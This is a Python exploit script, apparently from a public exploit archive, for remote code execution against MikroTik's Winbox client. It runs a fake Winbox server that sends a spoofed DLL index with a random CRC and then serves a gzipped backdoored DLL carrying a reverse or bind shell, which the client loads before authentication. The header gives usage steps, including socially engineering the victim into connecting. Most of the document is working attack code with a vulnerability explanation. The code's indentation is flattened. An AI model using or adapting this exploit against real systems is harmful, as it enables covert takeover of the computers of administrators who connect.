#!/usr/bin/python
# Exploit Title: Mikrotik's Winbox Remote Code Execution
# Author: PoURaN
# Software Link: http://www.mikrotik.com/download.html
# Version: probably all winbox versions. Tried 2.2.7 - 2.2.18
# Tested on: Windows XP SP2, SP3, Windows 7 SP1, Win2k8, Win2k3, Wine
# <> Other files needed by this exploit can be downloaded from http://www.133tsec.com/wp-content/uploads/2012/04/mtikInject.zip <>
#
# Vulnerability Description
# ===========================
# When you connect to mikrotik router using winbox, it is asking for an index
# with plugins (DLLs) their size, version and CRCs.
# If something new is found, or if that client haven't connected to that mikrotik version yet,
# winbox requests the new plugin(s) (.dll file(s)) from mikrotik router.
# When winbox downloads all the DLLs required in order to load the controlling interface of the
# mikrotik router, loads the DLLs and then tries to make an authentication
# to the remote mikrotik router. The vulnerability exploits that winbox
# is loading the remote dlls before authentication and without any further
# confirmation of plugins originality.
#
# The exploit
# =============
# This is a winbox vulnerability which exploits the way that winbox is working.
# That is the reason why it's working on all winbox versions (even on today's version)
# This exploit is based in leading (socialy) the victim to connect to this malicious
# winbox listener, using his/her winbox client.
# More details in www.133tsec.com
#
# Usage
# =======
# details in www.133tsec.com
# Download all files that exploit needs from http://www.133tsec.com/wp-content/uploads/2012/04/mtikInject.zip
# In order to use this exploit successfully you have to :
#
# 1. Have index.bin in the folder where .py script is running
# 2. Have all original DLLs of the spoofed index in the folder where .py script is running
# 3. Make a reverse/bind shell DLL, compress it with gzip and place it in script's folder and
# enter it's filename when script will ask for it.
# *** Your DLL's filename must have 7 chars length (ex. ppp.dll) ***
# *** The gziped version of the dll, must be between 10k-99k (must have 5 digits of size) ***
# The above 2 restrictions caused to the fact that i don't create the index dynamically from the script..
# 4. Social your victim to connect to the machine running the script, and gain the shell u r expecting
#
# <> Greetz flies to mbarb, dennis, andreas, AWMN and all friends and researchers out there <>
#
import socket,sys,os,struct,random
global fPointer
def SendFile(conn, filename):
f = open(filename, 'rb')
global fPointer
f.seek(fPointer)
fData = f.read(66049)
fPointer += 66049
f.close()
data = conn.send(fData)
random.seed()
print "\n+-----------------------------------+"
print "| |\\"
print "| Winbox remote client DLL injector | |"
print "| = coded by PoURaN = | |"
print "+___________________________________+ |"
print " \___________________________________\|"
randByte = str(random.randint(100,999)) # i need 3 random digits for a random crc
filename = raw_input("\nEnter the compressed filename: ")
fileRequest = 'ppp.dll' # this will be the file in the index, that the client will request
# and we'll send the backdoored dll instead of the original one.
try: # Open the compressed file (gzip format) in order to send it later..
f = open(filename, 'rb')
buff = f.read()
f.close()
except:
print "[-] Error opening file"
sys.exit(0)
# This number is very critical for the other structures
compressedFileSize = os.path.getsize(filename)
if compressedFileSize < 10000 or compressedFileSize > 99000:
print "[-] Error. Compressed filesize must be between 10k-99k! Read comments or visit 133tsec.com for details"
sys.exit(0)
# Make the index include the size of the custom dll file... overwrite the ppp.dll size
# ( That's why we need 7 chars filelength and 5 chars filesize.. got it? :D ok am a bit lazy... ;p )
f = open('index514.dat', 'rb')
myIndex = f.read()
f.close()
myIndex = myIndex[0:0x9F] + str(compressedFileSize) + myIndex[0xA4:] # changing filesize dynamically, in hardcoded ocffsets! **** THIS IS WRONG IF THE FILESIZE IS NOT 5 DIGITS! *****
myIndex = myIndex[0:0x9B] + randByte+" " + myIndex[0x9F:] # changing crc to a random one so am sure every time client is downloading my backdoor again.
WinboxHeader = ("\xFF\x02" + # WORD: hardcoded
#"\x70\x70\x70\x2E\x64\x6C\x6C" + # VARIABLE-SIZED: filename (printable chars) MAX:11 chars
fileRequest + # **** THIS IS WRONG IF THE FILENAME LENGTH IS NOT 7 CHARS! *****
"\x00\x00\x00\x00" + # VAR-SIZED: zero bytes till strlen(filename) + \x00*X = 11 bytes. These zeroes may not exist if strlen(filename) = 11
"\x01" + # BYTE: hardcoded. signals the end of zeros and beginning of the length
struct.pack('>h',compressedFileSize) + # WORD: length of gzip'ed file in big endian
"\x00\x00\x00\x00") # DWORD: hardcoded zeros before the gzip magic bytes.
print "\n\n[+] File \'"+filename+"\' opened with size "+str(compressedFileSize)+" bytes"
print "[+] Waiting connection on port 8291.."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 8291))
s.listen(1)
conn, addr = s.accept()
print '[+] Connection received by', addr
print "[+] Waiting for index."
data = conn.recv(1024)
if data.find("\x12\x02"+"index"+"\x00") > -1:
print "[+] Index received!"
else:
print "[+] Wrong index.. Exiting.."
sys.exit(0)
print "[+] Sending DLL Index (Step 1)"
# Step 1 : Sending the dll index list...
data = conn.send(myIndex)
data = conn.recv(1024)
global fPointer
fPointer=0
# checking if client requests the .dll we sent.. this depends to the CRC sent in Step 1
while data.find("\x12\x02") > -1: # If a file is requested.....
if data.find(fileRequest) > -1: # if the file is our backdoored compressed DLL.. ;)
print "[+] Client just requested " + fileRequest
print "[+] Sending compressed file with custom header (Step 2)"
#########################################################################################
# Step 2 : Sending the gzip file raw data with the custom header #
#########################################################################################
# Constructing the custom compressed file format #
#########################################################################################
# 1. The header of the gzip file must be in format: WinboxHeader #
# 2. The gzip contents must contain the word 0xFF 0xFF in every 257 bytes (0x101) #
# 3. The gzip last 0x101-chunk must contain the word 0x(size till end of file) 0xFF #
#########################################################################################
# Give the spark
customGzip = WinboxHeader
customGzip += buff[0:0xED]
customGzip += '\xFF\xFF'
#Loop the most data
for i in range(0x1EC, len(buff), 0xFF):
customGzip += buff[i-0xFF:i]
if 0x101 > (len(buff)-i): # if it's the last FF FF appended, then do it \x[(bytesToEOF)byte]\xFF
customGzip += struct.pack('=b', len(buff)-i) + '\xFF'
else:
customGzip += '\xFF\xFF'
#..and finish it
customGzip += buff[i:len(buff)]
data = conn.send(customGzip)
print "[+] Compressed file sent"
data = conn.recv(1024)
else: # else it's requesting another file from index..
while (data[2:].split("\x00")[0]!=fileRequest) and data[0:2]=="\x12\x02": # send other index's dll except the backdoored...
fPointer=0
print "[x] Client is requesting "+data[2:].split("\x00")[0]+" file.."
CurrentRequest=data[2:].split("\x00")[0]
while data[2:].split("\x00")[0]==CurrentRequest:
SendFile(conn, CurrentRequest)
data = conn.recv(1024)
print hex(struct.unpack('=B', data[18:19])[0]), hex(struct.unpack('=B', data[19:20])[0])
print "Succeeded.. Enjoy!"
conn.close()
